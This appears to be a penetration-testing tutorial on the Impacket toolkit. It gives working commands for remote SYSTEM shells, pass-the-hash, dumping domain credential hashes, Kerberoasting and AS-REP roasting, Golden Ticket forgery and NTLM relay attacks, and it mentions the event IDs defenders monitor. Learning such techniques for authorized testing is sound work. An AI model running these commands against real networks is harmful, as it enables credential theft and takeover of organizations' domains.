Impacket is a collection of Python classes for working with network protocols, but its real power lies in the suite of attack and post-exploitation scripts that ship with it. From remote code execution to credential dumping and Kerberoasting, Impacket covers a huge portion of a Windows penetration test. This guide walks you through the most important tools in the toolkit and how to use them in authorized lab environments.
Installing Impacket
The cleanest way to install Impacket is via pip inside a virtual environment on Kali Linux or any Debian-based system:
python3 -m venv impacket-env
source impacket-env/bin/activate
pip install impacket
Alternatively, clone the GitHub repo and install from source:
git clone https://github.com/fortra/impacket
cd impacket
pip install .
After installation, the example scripts live in impacket/examples/ and are also accessible directly from your PATH as commands like psexec.py, secretsdump.py, and so on.
psexec.py — Remote Command Execution
psexec.py mimics the Sysinternals PsExec tool, spawning a shell on a remote Windows machine using SMB and a service binary. You need local admin credentials on the target.
psexec.py DOMAIN/Administrator:Password123@192.168.1.10
This drops you into a SYSTEM shell. You can also pass the hash instead of a password using NTLM pass-the-hash:
psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@192.168.1.10
The format for the hash flag is LM:NT. If you only have the NT hash, use a dummy LM hash as shown above.
secretsdump.py — Credential Dumping
secretsdump.py is one of the most powerful tools in Impacket. It can extract NTLM hashes from the SAM database, NTDS.dit (Active Directory database), LSA secrets, and cached credentials — all remotely without dropping a binary on disk.
Dumping the SAM Database
secretsdump.py DOMAIN/Administrator:Password123@192.168.1.10
This outputs local account hashes, cached domain credentials, and LSA secrets.
Dumping NTDS.dit (Domain Controller)
If you have domain admin access, run the same command against a DC to extract every domain account hash:
secretsdump.py DOMAIN/DomainAdmin:Password@192.168.1.1
You’ll receive thousands of NTLM hashes in username:RID:LM:NT::: format, which can be fed directly into Hashcat or John the Ripper.
GetUserSPNs.py — Kerberoasting
Kerberoasting targets service accounts that have Service Principal Names (SPNs) set. Any domain user can request a Kerberos service ticket (TGS) for an SPN — and that ticket is encrypted with the service account’s password hash. Offline cracking then recovers the plaintext.
GetUserSPNs.py DOMAIN/normaluser:password -dc-ip 192.168.1.1 -request
The -request flag automatically requests tickets for all discovered SPNs and outputs them in Hashcat-compatible format ($krb5tgs$23$*...). Crack them with:
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt
GetNPUsers.py — AS-REP Roasting
AS-REP roasting targets accounts that have Kerberos pre-authentication disabled. Without pre-auth, the KDC responds to AS-REQ without verifying the requester’s identity, leaking an encrypted blob that can be cracked offline.
GetNPUsers.py DOMAIN/ -dc-ip 192.168.1.1 -usersfile users.txt -format hashcat
This is particularly effective after gathering a username list via LDAP enumeration or Kerbrute. The output hashes use Hashcat mode -m 18200.
wmiexec.py — Fileless Remote Execution
Unlike psexec.py, wmiexec.py uses Windows Management Instrumentation (WMI) for remote code execution and doesn’t write a service binary to disk, making it stealthier:
wmiexec.py DOMAIN/Administrator:Password@192.168.1.10
Output is returned semi-interactively. This is often preferred on engagements where AV/EDR is active because no persistent service is created.
smbclient.py — SMB Share Browsing
smbclient.py provides an FTP-like interface for browsing SMB shares:
smbclient.py DOMAIN/user:password@192.168.1.10
Inside the prompt, use shares to list available shares, then use SHARE and ls to navigate. Great for quickly grabbing files of interest without mounting shares.
lookupsid.py — RID Cycling for User Enumeration
RID cycling can enumerate domain users without authentication if null sessions are allowed:
lookupsid.py DOMAIN/guest:@192.168.1.1 20000
This enumerates SIDs up to RID 20000, which is usually sufficient to get all user and group accounts. Useful for building a target username list for Kerberoasting or password spraying.
ticketer.py — Golden and Silver Tickets
Once you have the KRBTGT hash (from secretsdump.py on a DC), you can forge Golden Tickets:
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-... -domain DOMAIN Administrator
This creates a .ccache Kerberos ticket file. Export it for use:
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@dc01.domain.local
Golden Tickets are valid for 10 years by default and persist even after password changes, as long as the KRBTGT hash isn’t rotated twice.
ntlmrelayx.py — NTLM Relay Attacks
ntlmrelayx.py relays captured NTLM authentication to other targets. Combined with Responder (to capture hashes), this is a classic attack chain:
# In one terminal (disable SMB/HTTP in Responder.conf first):
responder -I eth0 -rdw
# In another terminal:
ntlmrelayx.py -tf targets.txt -smb2support
When a victim authenticates to the attacker (triggered by Responder), ntlmrelayx relays those credentials to targets in targets.txt, potentially executing commands or dumping SAM databases.
Best Practices
Always operate within authorized scope and document every command run during an engagement. Impacket leaves artifacts in Windows event logs — particularly Event IDs 4624, 4648, 7045, and 4776 — so blue teams will detect heavy usage. Use tools selectively and understand what each command does before running it. In a real engagement, combine Impacket findings with BloodHound path analysis to identify the most efficient attack chains to domain compromise.
Impacket is pre-installed on Kali Linux and Parrot OS, and it’s worth keeping it updated via pip or the GitHub repository since new features and bug fixes are released regularly.